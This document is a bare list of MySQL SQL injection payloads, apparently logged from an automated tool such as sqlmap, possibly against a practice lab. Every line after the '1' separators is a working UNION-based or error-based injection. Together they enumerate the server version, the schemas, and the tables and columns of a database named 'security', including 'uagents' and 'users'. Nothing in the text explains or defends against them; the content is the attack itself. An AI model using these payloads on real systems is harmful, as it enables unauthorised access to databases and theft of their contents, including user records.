1
-7164 UNION ALL SELECT NULL,CONCAT(0x71626a7171,IFNULL(CAST(VERSION() AS CHAR),0x20),0x7176786271),NULL-- ZLgW
1
-7892 UNION ALL SELECT NULL,CONCAT(0x71626a7171,IFNULL(CAST(COUNT(schema_name) AS CHAR),0x20),0x7176786271),NULL FROM INFORMATION_SCHEMA.SCHEMATA-- zJVv
1
-4742 UNION ALL SELECT NULL,CONCAT(0x71626a7171,IFNULL(CAST(COUNT(table_name) AS CHAR),0x20),0x7176786271),NULL FROM INFORMATION_SCHEMA.TABLES WHERE table_schema IN (0x7365637572697479)-- QGzV
1
-5294 UNION ALL SELECT NULL,CONCAT(0x71626a7171,IFNULL(CAST(COUNT(*) AS CHAR),0x20),0x7176786271),NULL FROM INFORMATION_SCHEMA.COLUMNS WHERE table_name=0x756167656e7473 AND table_schema=0x7365637572697479-- BFpo
1 AND (SELECT 6641 FROM(SELECT COUNT(*),CONCAT(0x71626a7171,(SELECT IFNULL(CAST(COUNT(*) AS CHAR),0x20) FROM INFORMATION_SCHEMA.COLUMNS WHERE table_name=0x756167656e7473 AND table_schema=0x7365637572697479),0x7176786271,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
1 AND (SELECT 5294 FROM(SELECT COUNT(*),CONCAT(0x71626a7171,(SELECT MID((IFNULL(CAST(column_name AS CHAR),0x20)),1,54) FROM INFORMATION_SCHEMA.COLUMNS WHERE table_name=0x756167656e7473 AND table_schema=0x7365637572697479 LIMIT 0,1),0x7176786271,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
1 AND (SELECT 3947 FROM(SELECT COUNT(*),CONCAT(0x71626a7171,(SELECT MID((IFNULL(CAST(column_type AS CHAR),0x20)),1,54) FROM INFORMATION_SCHEMA.COLUMNS WHERE table_name=0x756167656e7473 AND table_schema=0x7365637572697479 LIMIT 0,1),0x7176786271,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
1 AND (SELECT 3468 FROM(SELECT COUNT(*),CONCAT(0x71626a7171,(SELECT MID((IFNULL(CAST(column_name AS CHAR),0x20)),1,54) FROM INFORMATION_SCHEMA.COLUMNS WHERE table_name=0x756167656e7473 AND table_schema=0x7365637572697479 LIMIT 1,1),0x7176786271,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
1 AND (SELECT 7678 FROM(SELECT COUNT(*),CONCAT(0x71626a7171,(SELECT MID((IFNULL(CAST(column_type AS CHAR),0x20)),1,54) FROM INFORMATION_SCHEMA.COLUMNS WHERE table_name=0x756167656e7473 AND table_schema=0x7365637572697479 LIMIT 1,1),0x7176786271,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
1 AND (SELECT 9856 FROM(SELECT COUNT(*),CONCAT(0x71626a7171,(SELECT MID((IFNULL(CAST(column_name AS CHAR),0x20)),1,54) FROM INFORMATION_SCHEMA.COLUMNS WHERE table_name=0x756167656e7473 AND table_schema=0x7365637572697479 LIMIT 2,1),0x7176786271,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
1 AND (SELECT 6164 FROM(SELECT COUNT(*),CONCAT(0x71626a7171,(SELECT MID((IFNULL(CAST(column_type AS CHAR),0x20)),1,54) FROM INFORMATION_SCHEMA.COLUMNS WHERE table_name=0x756167656e7473 AND table_schema=0x7365637572697479 LIMIT 2,1),0x7176786271,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
1 AND (SELECT 3229 FROM(SELECT COUNT(*),CONCAT(0x71626a7171,(SELECT MID((IFNULL(CAST(column_name AS CHAR),0x20)),1,54) FROM INFORMATION_SCHEMA.COLUMNS WHERE table_name=0x756167656e7473 AND table_schema=0x7365637572697479 LIMIT 3,1),0x7176786271,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
1 AND (SELECT 7641 FROM(SELECT COUNT(*),CONCAT(0x71626a7171,(SELECT MID((IFNULL(CAST(column_type AS CHAR),0x20)),1,54) FROM INFORMATION_SCHEMA.COLUMNS WHERE table_name=0x756167656e7473 AND table_schema=0x7365637572697479 LIMIT 3,1),0x7176786271,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
1
-4692 UNION ALL SELECT NULL,CONCAT(0x71626a7171,IFNULL(CAST(COUNT(*) AS CHAR),0x20),0x7176786271),NULL FROM INFORMATION_SCHEMA.COLUMNS WHERE table_name=0x7573657273 AND table_schema=0x7365637572697479-- FFeR
1